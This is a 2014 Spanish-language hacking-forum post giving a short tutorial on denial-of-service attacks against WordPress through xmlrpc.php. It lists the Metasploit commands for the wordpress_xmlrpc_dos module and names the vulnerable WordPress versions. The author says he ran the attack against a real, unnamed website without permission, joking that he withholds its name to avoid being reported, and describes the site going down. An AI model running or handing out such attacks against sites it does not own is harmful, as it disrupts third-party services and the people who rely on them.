3. DoS en Wordpress con xmlrpc.php
Páginas: [1]   Ir Abajo
« anterior próximo »

DoS en Wordpress con xmlrpc.php

  • 0 Respuestas
  • 4185 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ZanGetsu

  • *
  • Ex-Staff
  • *****
  • Mensajes: 329
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • I ZanGetsu
  • Skype: thenicox
  • Twitter: black_zangetsu
    • Ver Perfil

DoS en Wordpress con xmlrpc.php

  • en: Septiembre 09, 2014, 03:26:33 pm
Que hay chicos les traigo este peque tuto

xmlrpc.php para que sirve?

Xmlrpc.php es el encargado de permitirnos postear remotamente a través de Microsoft Word, Textmate, Thunderbird, smartphones, entre otros clientes. Todo ello a través del protocolo XML-RPC.


Además será quien se encargue de recibir los pingbacks (enlaces de otros blogs hacía alguno de nuestros artículos) y enviar los trackbacks (enlaces de nuestro blog hacía artículos de otro blog).

Bueno ya la vulne de xmlrpc me la tope hace mucho tiempo (http://blackkzangetsu.blogspot.com/2...xplotable.html)
este archivo se usa para realizar un poderoso ataque Dos, en donde el amigo metasploit ya hizo su trabajo :D

Código: [Seleccionar]
msf > use auxiliary/dos/http/wordpress_xmlrpc_dos     
msf auxiliary(wordpress_xmlrpc_dos) > show actions           
...actions...
msf auxiliary(wordpress_xmlrpc_dos) > set ACTION <action-name>     
msf auxiliary(wordpress_xmlrpc_dos) > show options           
...show and set options...
msf auxiliary(wordpress_xmlrpc_dos) > run
Yo busque un website con wp versiones vulnerables: 3.5 - 3.9.2



No muestro el website para demostrar algo de etica (na mentira para que no denuncien jajaj)

Despues de completar el rhost y targeturi le damos a run



y con esto estaremos empezando el dos, el website cae a ratos, pero veamos un test
de velocidad de carga antes y despues:

Antes:



Con el dos activo:





Saludos !
« Última modificación: Junio 07, 2015, 07:46:44 pm por EPSILON »
En línea
Páginas: [1]   Ir Arriba
« anterior próximo »
 

Herramienta de test de penetración para WordPress o Joomla!

Iniciado por graphixx

 Respuestas: 0
Vistas: 3390 		Último mensaje Octubre 16, 2015, 07:24:41 am
por graphixx
Brute Force en paneles de administración WordPress con WPScan

Iniciado por BrowserNet

 Respuestas: 2
Vistas: 3659 		Último mensaje Junio 01, 2016, 01:31:11 am
por BrowserNet
Como subir shell en Wordpress

Iniciado por AΞRCRΞA

 Respuestas: 1
Vistas: 5980 		Último mensaje Noviembre 13, 2013, 03:14:53 am
por Tulkalex
Cómo encontrar Malware en su web de WordPress

Iniciado por morodog

 Respuestas: 0
Vistas: 2670 		Último mensaje Marzo 11, 2015, 05:27:43 am
por morodog
Securizar el acceso a wp-admin de WordPress

Iniciado por BlackDead

 Respuestas: 1
Vistas: 2825 		Último mensaje Agosto 07, 2013, 01:19:51 am
por ZanGetsu